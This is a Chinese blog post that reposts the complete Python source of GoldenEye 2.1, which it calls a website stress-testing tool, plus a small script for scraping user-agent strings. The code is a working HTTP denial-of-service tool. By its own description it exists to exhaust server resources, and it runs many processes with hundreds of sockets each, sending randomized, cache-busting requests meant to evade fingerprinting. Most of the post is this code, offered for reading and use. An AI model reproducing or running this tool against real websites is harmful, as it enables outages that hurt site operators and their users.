首页 > 代码库 > Goldeneye.py网站压力测试工具2.1版源码

Goldeneye.py网站压力测试工具2.1版源码

Goldeneye压力测试工具的源代码,粗略看了下,代码写的蛮规范和易读的,打算边读边加上了中文注释,但是想来也没太大必要,代码600多行,值得学习的地方还是蛮多的,喜欢Python的同学可以一读

这个是Github上的最新版本了,2.1版,相比之前的2.0版本(2013年),作者删去了耦合在代码中的useragents

self.useragents = [    Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3,    Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729),    Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729),    Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1,    Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1,    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2),    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729),    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0),    Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2),    Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US),    Mozilla/4.0 (compatible; MSIE 6.1; Windows XP),    Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51,    ]

转而使用这种随机产生的:

USER_AGENT_PARTS = {    os: {        linux: {            name: [ Linux x86_64, Linux i386 ],            ext: [ X11 ]        },        windows: {            name: [ Windows NT 6.1, Windows NT 6.3, Windows NT 5.1, Windows NT.6.2 ],            ext: [ WOW64, Win64; x64 ]        },        mac: {            name: [ Macintosh ],            ext: [ Intel Mac OS X %d_%d_%d % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5)) for i in range(1, 10) ]        },    },    platform: {        webkit: {            name: [ AppleWebKit/%d.%d % (random.randint(535, 537), random.randint(1,36)) for i in range(1, 30) ],            details: [ KHTML, like Gecko ],            extensions: [ Chrome/%d.0.%d.%d Safari/%d.%d % (random.randint(6, 32), random.randint(100, 2000), random.randint(0, 100), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 30) ] + [ Version/%d.%d.%d Safari/%d.%d % (random.randint(4, 6), random.randint(0, 1), random.randint(0, 9), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 10) ]        },        iexplorer: {            browser_info: {                name: [ MSIE 6.0, MSIE 6.1, MSIE 7.0, MSIE 7.0b, MSIE 8.0, MSIE 9.0, MSIE 10.0 ],                ext_pre: [ compatible, Windows; U ],                ext_post: [ Trident/%d.0 % i for i in range(4, 6) ] + [ .NET CLR %d.%d.%d % (random.randint(1, 3), random.randint(0, 5), random.randint(1000, 30000)) for i in range(1, 10) ]            }        },        gecko: {            name: [ Gecko/%d%02d%02d Firefox/%d.0 % (random.randint(2001, 2010), random.randint(1,31), random.randint(1,12) , random.randint(10, 25)) for i in range(1, 30) ],            details: [],            extensions: []        }    }}

 

2.0中的referers

self.referers = [     http://www.google.com/?q=,    http://www.usatoday.com/search/results?q=,    http://engadget.search.aol.com/search?q=,    http:// + self.host + /    ]

2.1中的referers

self.referers = [     http://www.google.com/,    http://www.bing.com/,    http://www.baidu.com/,    http://www.yandex.com/,    http:// + self.host + /    ]

从这个referers的变化看,度受在国外也蛮出名了呢~~哈哈,作者也真是挺萌的


更新日志主要就是删去了他删去了之前自认为“愚蠢”的固定的useragents做法,采用随机数生成

## Changelog* 2014-02-20  Added randomly created user agents (still RFC compliant). * 2014-02-19  Removed silly referers and user agents. Improved randomness of referers. Added external user-agent list support.* 2013-03-26  Changed from threading to multiprocessing. Still has some bugs to resolve like I still don‘t know how to propperly shutdown the manager.* 2012-12-09  Initial release

 

源码:(600多行代码,点击请谨慎)

技术分享
#!/usr/bin/env python"""$Id: $     /$$$$$$            /$$       /$$                     /$$$$$$$$                        /$$__  $$          | $$      | $$                    | $$_____/                       | $$  \__/  /$$$$$$ | $$  /$$$$$$$  /$$$$$$  /$$$$$$$ | $$       /$$   /$$  /$$$$$$    | $$ /$$$$ /$$__  $$| $$ /$$__  $$ /$$__  $$| $$__  $$| $$$$$   | $$  | $$ /$$__  $$   | $$|_  $$| $$  \ $$| $$| $$  | $$| $$$$$$$$| $$  \ $$| $$__/   | $$  | $$| $$$$$$$$   | $$  \ $$| $$  | $$| $$| $$  | $$| $$_____/| $$  | $$| $$      | $$  | $$| $$_____/   |  $$$$$$/|  $$$$$$/| $$|  $$$$$$$|  $$$$$$$| $$  | $$| $$$$$$$$|  $$$$$$$|  $$$$$$$    \______/  \______/ |__/ \_______/ \_______/|__/  |__/|________/ \____  $$ \_______/                                                                     /$$  | $$                                                                              |  $$$$$$/                                                                               \______/                                                                                                                                                                                                                 This tool is a dos tool that is meant to put heavy load on HTTP serversin order to bring them to their knees by exhausting the resource pool.This tool is meant for research purposes onlyand any malicious usage of this tool is prohibited.@author Jan Seidl <http://wroot.org/>@date 2014-02-18@version 2.1@TODO Test in python 3.xLICENSE:This software is distributed under the GNU General Public License version 3 (GPLv3)LEGAL NOTICE:THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!IF YOU ENGAGE IN ANY ILLEGAL ACTIVITYTHE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT.BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS."""from multiprocessing import Process, Manager, Poolimport urlparse, sslimport sys, getopt, random, time, os# Python version-specific if  sys.version_info < (3,0):    # Python 2.x    import httplib    HTTPCLIENT = httplibelse:    # Python 3.x    import http.client    HTTPCLIENT = http.client##### Config####DEBUG = False##### Constants####METHOD_GET  = getMETHOD_POST = postMETHOD_RAND = randomJOIN_TIMEOUT=1.0DEFAULT_WORKERS=10DEFAULT_SOCKETS=500GOLDENEYE_BANNER = GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>USER_AGENT_PARTS = {    os: {        linux: {            name: [ Linux x86_64, Linux i386 ],            ext: [ X11 ]        },        windows: {            name: [ Windows NT 6.1, Windows NT 6.3, Windows NT 5.1, Windows NT.6.2 ],            ext: [ WOW64, Win64; x64 ]        },        mac: {            name: [ Macintosh ],            ext: [ Intel Mac OS X %d_%d_%d % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5)) for i in range(1, 10) ]        },    },    platform: {        webkit: {            name: [ AppleWebKit/%d.%d % (random.randint(535, 537), random.randint(1,36)) for i in range(1, 30) ],            details: [ KHTML, like Gecko ],            extensions: [ Chrome/%d.0.%d.%d Safari/%d.%d % (random.randint(6, 32), random.randint(100, 2000), random.randint(0, 100), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 30) ] + [ Version/%d.%d.%d Safari/%d.%d % (random.randint(4, 6), random.randint(0, 1), random.randint(0, 9), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 10) ]        },        iexplorer: {            browser_info: {                name: [ MSIE 6.0, MSIE 6.1, MSIE 7.0, MSIE 7.0b, MSIE 8.0, MSIE 9.0, MSIE 10.0 ],                ext_pre: [ compatible, Windows; U ],                ext_post: [ Trident/%d.0 % i for i in range(4, 6) ] + [ .NET CLR %d.%d.%d % (random.randint(1, 3), random.randint(0, 5), random.randint(1000, 30000)) for i in range(1, 10) ]            }        },        gecko: {            name: [ Gecko/%d%02d%02d Firefox/%d.0 % (random.randint(2001, 2010), random.randint(1,31), random.randint(1,12) , random.randint(10, 25)) for i in range(1, 30) ],            details: [],            extensions: []        }    }}##### GoldenEye Class####class GoldenEye(object):    # Counters    counter = [0, 0]    last_counter = [0, 0]    # Containers    workersQueue = []    manager = None    useragents = []    # Properties    url = None    # Options    nr_workers = DEFAULT_WORKERS    nr_sockets = DEFAULT_SOCKETS    method = METHOD_GET    def __init__(self, url):        # Set URL        self.url = url        # Initialize Manager        self.manager = Manager()        # Initialize Counters        self.counter = self.manager.list((0, 0))    def exit(self):        self.stats()        print "Shutting down GoldenEye"    def __del__(self):        self.exit()    def printHeader(self):        # Taunt!        print        print GOLDENEYE_BANNER        print    # Do the fun!    def fire(self):        self.printHeader()        print "Hitting webserver in mode ‘{0}‘ with {1} workers running {2} connections each. Hit CTRL+C to cancel.".format(self.method, self.nr_workers, self.nr_sockets)        if DEBUG:            print "Starting {0} concurrent workers".format(self.nr_workers)        # Start workers        for i in range(int(self.nr_workers)):            try:                worker = Striker(self.url, self.nr_sockets, self.counter)                worker.useragents = self.useragents                worker.method = self.method                self.workersQueue.append(worker)                worker.start()            except (Exception):                error("Failed to start worker {0}".format(i))                pass         if DEBUG:            print "Initiating monitor"        self.monitor()    def stats(self):        try:            if self.counter[0] > 0 or self.counter[1] > 0:                print "{0} GoldenEye strikes deferred. ({1} Failed)".format(self.counter[0], self.counter[1])                if self.counter[0] > 0 and self.counter[1] > 0 and self.last_counter[0] == self.counter[0] and self.counter[1] > self.last_counter[1]:                    print "\tServer may be DOWN!"                    self.last_counter[0] = self.counter[0]                self.last_counter[1] = self.counter[1]        except (Exception):            pass # silently ignore    def monitor(self):        while len(self.workersQueue) > 0:            try:                for worker in self.workersQueue:                    if worker is not None and worker.is_alive():                        worker.join(JOIN_TIMEOUT)                    else:                        self.workersQueue.remove(worker)                self.stats()            except (KeyboardInterrupt, SystemExit):                print "CTRL+C received. Killing all workers"                for worker in self.workersQueue:                    try:                        if DEBUG:                            print "Killing worker {0}".format(worker.name)                        #worker.terminate()                        worker.stop()                    except Exception, ex:                        pass # silently ignore                if DEBUG:                    raise                else:                    pass##### Striker Class####class Striker(Process):            # Counters    request_count = 0    failed_count = 0    # Containers    url = None    host = None    port = 80    ssl = False    referers = []    useragents = []    socks = []    counter = None    nr_socks = DEFAULT_SOCKETS    # Flags    runnable = True    # Options    method = METHOD_GET    def __init__(self, url, nr_sockets, counter):        super(Striker, self).__init__()        self.counter = counter        self.nr_socks = nr_sockets        parsedUrl = urlparse.urlparse(url)        if parsedUrl.scheme == https:            self.ssl = True        self.host = parsedUrl.netloc.split(:)[0]        self.url = parsedUrl.path        self.port = parsedUrl.port        if not self.port:            self.port = 80 if not self.ssl else 443        self.referers = [             http://www.google.com/,            http://www.bing.com/,            http://www.baidu.com/,            http://www.yandex.com/,            http:// + self.host + /            ]    def __del__(self):        self.stop()    #builds random ascii string    def buildblock(self, size):        out_str = ‘‘        _LOWERCASE = range(97, 122)        _UPPERCASE = range(65, 90)        _NUMERIC   = range(48, 57)        validChars = _LOWERCASE + _UPPERCASE + _NUMERIC        for i in range(0, size):            a = random.choice(validChars)            out_str += chr(a)        return out_str    def run(self):        if DEBUG:            print "Starting worker {0}".format(self.name)        while self.runnable:            try:                for i in range(self.nr_socks):                                    if self.ssl:                        c = HTTPCLIENT.HTTPSConnection(self.host, self.port)                    else:                        c = HTTPCLIENT.HTTPConnection(self.host, self.port)                    self.socks.append(c)                for conn_req in self.socks:                    (url, headers) = self.createPayload()                    method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method                    conn_req.request(method.upper(), url, None, headers)                for conn_resp in self.socks:                    resp = conn_resp.getresponse()                    self.incCounter()                self.closeConnections()                            except:                self.incFailed()                if DEBUG:                    raise                else:                    pass # silently ignore        if DEBUG:            print "Worker {0} completed run. Sleeping...".format(self.name)                def closeConnections(self):        for conn in self.socks:            try:                conn.close()            except:                pass # silently ignore                def createPayload(self):        req_url, headers = self.generateData()        random_keys = headers.keys()        random.shuffle(random_keys)        random_headers = {}                for header_name in random_keys:            random_headers[header_name] = headers[header_name]        return (req_url, random_headers)    def generateQueryString(self, ammount = 1):        queryString = []        for i in range(ammount):            key = self.buildblock(random.randint(3,10))            value = self.buildblock(random.randint(3,20))            element = "{0}={1}".format(key, value)            queryString.append(element)        return &.join(queryString)                    def generateData(self):        returnCode = 0        param_joiner = "?"        if len(self.url) == 0:            self.url = /        if self.url.count("?") > 0:            param_joiner = "&"        request_url = self.generateRequestUrl(param_joiner)        http_headers = self.generateRandomHeaders()        return (request_url, http_headers)    def generateRequestUrl(self, param_joiner = ?):        return self.url + param_joiner + self.generateQueryString(random.randint(1,5))    def getUserAgent(self):        if self.useragents:            return random.choice(self.useragents)        # Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions]        ## Mozilla Version        mozilla_version = "Mozilla/5.0" # hardcoded for now, almost every browser is on this version except IE6        ## System And Browser Information        # Choose random OS        os = USER_AGENT_PARTS[os][random.choice(USER_AGENT_PARTS[os].keys())]        os_name = random.choice(os[name])         sysinfo = os_name        # Choose random platform        platform = USER_AGENT_PARTS[platform][random.choice(USER_AGENT_PARTS[platform].keys())]        # Get Browser Information if available        if browser_info in platform and platform[browser_info]:            browser = platform[browser_info]            browser_string = random.choice(browser[name])            if ext_pre in browser:                browser_string = "%s; %s" % (random.choice(browser[ext_pre]), browser_string)            sysinfo = "%s; %s" % (browser_string, sysinfo)            if ext_post in browser:                sysinfo = "%s; %s" % (sysinfo, random.choice(browser[ext_post]))        if ext in os and os[ext]:            sysinfo = "%s; %s" % (sysinfo, random.choice(os[ext]))        ua_string = "%s (%s)" % (mozilla_version, sysinfo)        if name in platform and platform[name]:            ua_string = "%s %s" % (ua_string, random.choice(platform[name]))        if details in platform and platform[details]:            ua_string = "%s (%s)" % (ua_string, random.choice(platform[details]) if len(platform[details]) > 1 else platform[details][0] )        if extensions in platform and platform[extensions]:            ua_string = "%s %s" % (ua_string, random.choice(platform[extensions]))        return ua_string    def generateRandomHeaders(self):        # Random no-cache entries        noCacheDirectives = [no-cache, max-age=0]        random.shuffle(noCacheDirectives)        nrNoCache = random.randint(1, (len(noCacheDirectives)-1))        noCache = , .join(noCacheDirectives[:nrNoCache])        # Random accept encoding        acceptEncoding = [\‘\‘,*,identity,gzip,deflate]        random.shuffle(acceptEncoding)        nrEncodings = random.randint(1,len(acceptEncoding)/2)        roundEncodings = acceptEncoding[:nrEncodings]        http_headers = {            User-Agent: self.getUserAgent(),            Cache-Control: noCache,            Accept-Encoding: , .join(roundEncodings),            Connection: keep-alive,            Keep-Alive: random.randint(1,1000),            Host: self.host,        }            # Randomly-added headers        # These headers are optional and are         # randomly sent thus making the        # header count random and unfingerprintable        if random.randrange(2) == 0:            # Random accept-charset            acceptCharset = [ ISO-8859-1, utf-8, Windows-1251, ISO-8859-2, ISO-8859-15, ]            random.shuffle(acceptCharset)            http_headers[Accept-Charset] = {0},{1};q={2},*;q={3}.format(acceptCharset[0], acceptCharset[1],round(random.random(), 1), round(random.random(), 1))        if random.randrange(2) == 0:            # Random Referer            url_part = self.buildblock(random.randint(5,10))            random_referer = random.choice(self.referers) + url_part                        if random.randrange(2) == 0:                random_referer = random_referer + ? + self.generateQueryString(random.randint(1, 10))            http_headers[Referer] = random_referer        if random.randrange(2) == 0:            # Random Content-Trype            http_headers[Content-Type] = random.choice([multipart/form-data, application/x-url-encoded])        if random.randrange(2) == 0:            # Random Cookie            http_headers[Cookie] = self.generateQueryString(random.randint(1, 5))        return http_headers    # Housekeeping    def stop(self):        self.runnable = False        self.closeConnections()        self.terminate()    # Counter Functions    def incCounter(self):        try:            self.counter[0] += 1        except (Exception):            pass    def incFailed(self):        try:            self.counter[1] += 1        except (Exception):            pass        ######### Other Functions####def usage():    print    print -----------------------------------------------------------------------------------------------------------    print    print GOLDENEYE_BANNER    print     print  USAGE: ./goldeneye.py <url> [OPTIONS]    print    print  OPTIONS:    print \t Flag\t\t\tDescription\t\t\t\t\t\tDefault    print \t -u, --useragents\tFile with user-agents to use\t\t\t\t(default: randomly generated)    print \t -w, --workers\t\tNumber of concurrent workers\t\t\t\t(default: {0}).format(DEFAULT_WORKERS)    print \t -s, --sockets\t\tNumber of concurrent sockets\t\t\t\t(default: {0}).format(DEFAULT_SOCKETS)    print \t -m, --method\t\tHTTP Method to use \‘get\‘ or \‘post\‘  or \‘random\‘\t\t(default: get)    print \t -d, --debug\t\tEnable Debug Mode [more verbose output]\t\t\t(default: False)    print \t -h, --help\t\tShows this help    print    print -----------------------------------------------------------------------------------------------------------    def error(msg):    # print help information and exit:    sys.stderr.write(str(msg+"\n"))    usage()    sys.exit(2)##### Main####def main():        try:        if len(sys.argv) < 2:            error(Please supply at least the URL)        url = sys.argv[1]        if url == -h:            usage()            sys.exit()        if url[0:4].lower() != http:            error("Invalid URL supplied")        if url == None:            error("No URL supplied")        opts, args = getopt.getopt(sys.argv[2:], "dhw:s:m:u:", ["debug", "help", "workers", "sockets", "method", "useragents" ])        workers = DEFAULT_WORKERS        socks = DEFAULT_SOCKETS        method = METHOD_GET        uas_file = None        useragents = []        for o, a in opts:            if o in ("-h", "--help"):                usage()                sys.exit()            elif o in ("-u", "--useragents"):                uas_file = a            elif o in ("-s", "--sockets"):                socks = int(a)            elif o in ("-w", "--workers"):                workers = int(a)            elif o in ("-d", "--debug"):                global DEBUG                DEBUG = True            elif o in ("-m", "--method"):                if a in (METHOD_GET, METHOD_POST, METHOD_RAND):                    method = a                else:                    error("method {0} is invalid".format(a))            else:                error("option ‘"+o+"‘ doesn‘t exists")        if uas_file:            try:                with open(uas_file) as f:                    useragents = f.readlines()            except EnvironmentError:                    error("cannot read file {0}".format(uas_file))        goldeneye = GoldenEye(url)        goldeneye.useragents = useragents        goldeneye.nr_workers = workers        goldeneye.method = method        goldeneye.nr_sockets = socks        goldeneye.fire()    except getopt.GetoptError, err:        # print help information and exit:        sys.stderr.write(str(err))        usage()        sys.exit(2)if __name__ == "__main__":    main()
goldeneye.py

 

附带的工具也蛮有用的:这是一个从http://www.useragentstring.com/上爬取UA的的脚本,应该是极简版本了。不过也是个BeautifulSoup入门的小例子。

使用这个脚本需要先进入网站:http://www.useragentstring.com/pages/useragentstring.php

然后进入某个条目下,比如firefox,可以获取这样的网址:http://www.useragentstring.com/pages/Firefox/

然后运行下面的脚本,使用最后那个网址的参数,就可以抓取好多的UA信息了,之前还以为会自动解析,然后保存成文件,然后在主程序调用使用...

而不是现在的在主程序随机生成UA,不过看这情况,作者应该会在下一次更新时进行整合,否则这个0.1版的小脚本也没什么用了。

#!/usr/bin/env pythonimport urllib, sysfrom bs4 import BeautifulSoupif len(sys.argv) <= 1:    print "No URL specified. Please supply a valid http://www.useragentstring.com/ UA list URL"    sys.exit(1)ua_url = sys.argv[1]f = urllib.urlopen(ua_url)html_doc = f.read()soup = BeautifulSoup(html_doc)liste = soup.find(id=liste)uas = liste.find_all(li)if len(uas) <= 0:    print "No UAs Found. Are you on http://www.useragentstring.com/ lists?"    sys.exit(1)for ua in uas:    ua_string = ua.get_text()    ua_string = ua_string.strip( \t\n\r)    print ua_string

 

Goldeneye.py网站压力测试工具2.1版源码